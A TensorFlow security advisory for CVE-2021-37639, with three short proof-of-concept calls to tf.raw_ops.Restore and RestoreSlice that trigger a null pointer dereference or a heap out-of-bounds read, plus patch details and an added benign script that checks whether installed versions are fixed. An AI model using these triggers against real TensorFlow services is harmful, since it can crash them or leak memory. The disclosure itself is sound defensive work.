## TFSA-2021-113: Null pointer dereference and heap OOB read in operations restoring tensors

### CVE Number
CVE-2021-37639

### Impact
When restoring tensors via raw APIs, if the tensor name is not provided,
TensorFlow can be tricked into dereferencing a null pointer:

```python
import tensorflow as tf

tf.raw_ops.Restore(
  file_pattern=['/tmp'],
  tensor_name=[],
  default_value=21,
  dt=tf.int,
  preferred_shard=1)
```

The same undefined behavior can be triggered by `tf.raw_ops.RestoreSlice`:

```python
import tensorflow as tf

tf.raw_ops.RestoreSlice(
  file_pattern=['/tmp'],
  tensor_name=[],
  shape_and_slice='2',
  dt=inp.array([tf.int]),
  preferred_shard=1)
```

Alternatively, attackers can read memory outside the bounds of heap allocated
data by providing some tensor names but not enough for a successful restoration:

```python
import tensorflow as tf

tf.raw_ops.Restore(
  file_pattern=['/tmp'],
  tensor_name=['x'],
  default_value=21,
  dt=tf.int,
  preferred_shard=42)
```

The
[implementation](https://github.com/tensorflow/tensorflow/blob/47a06f40411a69c99f381495f490536972152ac0/tensorflow/core/kernels/save_restore_tensor.cc#L158-L159)
retrieves the tensor list corresponding to the user-controlled `tensor_name`
input and immediately retrieves the tensor at the restoration index (controlled
via the `preferred_shard` argument). This occurs without validating that the
provided list has enough values.

If the list is empty, this results in dereferencing a null pointer (undefined
behavior). If the list has some elements but the restoration index is outside
its bounds, this results in a heap OOB read.

### Patches
We have patched the issue in GitHub commit
[9e82dce6e6bd1f36a57e08fa85af213e2b2f2622](https://github.com/tensorflow/tensorflow/commit/9e82dce6e6bd1f36a57e08fa85af213e2b2f2622).

The fix will be included in TensorFlow 2.6.0. We will also cherry-pick this
commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are
also affected and still in supported range.
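
To check an environment against the fixed releases listed above, the following added example (not part of the original advisory or of TensorFlow) classifies a version string. It assumes that releases after 2.6 carry the fix, that a pre-release of a fixed version does not, and that the three distribution names shown are the ones in use; `classify` and `installed_status` are hypothetical helper names.

```python
import re
from importlib import metadata

# Fixed releases named in the advisory, as {(major, minor): first fixed patch}.
FIXED = {(2, 3): 4, (2, 4): 3, (2, 5): 1, (2, 6): 0}
# Assumption: these PyPI distribution names cover the common TensorFlow builds.
DISTRIBUTIONS = ("tensorflow", "tensorflow-cpu", "tensorflow-gpu")


def classify(version):
    """Return 'patched', 'affected' or 'unsupported' for a version string."""
    m = re.match(r"(\d+)\.(\d+)\.(\d+)(.*)$", version.strip())
    if not m:
        raise ValueError(f"unrecognised version: {version!r}")
    major, minor, patch = (int(g) for g in m.group(1, 2, 3))
    # Pre-releases (rc, a, b, dev) sort before the release they precede.
    prerelease = re.match(r"[-.]?(rc|a|b|dev)\d*", m.group(4)) is not None
    branch = (major, minor)
    if branch > max(FIXED):
        return "patched"      # assumption: releases after 2.6 carry the fix
    if branch not in FIXED:
        return "unsupported"  # older branch: the advisory lists no fixed release
    fixed_patch = FIXED[branch]
    if patch > fixed_patch or (patch == fixed_patch and not prerelease):
        return "patched"
    return "affected"


def installed_status():
    """Classify every TensorFlow distribution found in this environment."""
    found = {}
    for name in DISTRIBUTIONS:
        try:
            found[name] = classify(metadata.version(name))
        except metadata.PackageNotFoundError:
            continue
    return found


if __name__ == "__main__":
    # Constructed sample versions, followed by whatever is installed locally.
    for sample in ("2.3.3", "2.4.3", "2.5.0", "2.6.0rc1", "2.6.0", "2.2.1"):
        print(f"{sample:10s} {classify(sample)}")
    print("installed:", installed_status() or "no TensorFlow distribution found")
```

A result of `unsupported` means the branch predates the supported range named above, so the only remedy is moving to a release that contains the fix.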

### For more information
Please consult [our security
guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for
more information regarding the security model and how to contact us with issues
and questions.

### Attribution
This vulnerability has been reported by members of the Aivul Team from Qihoo
360.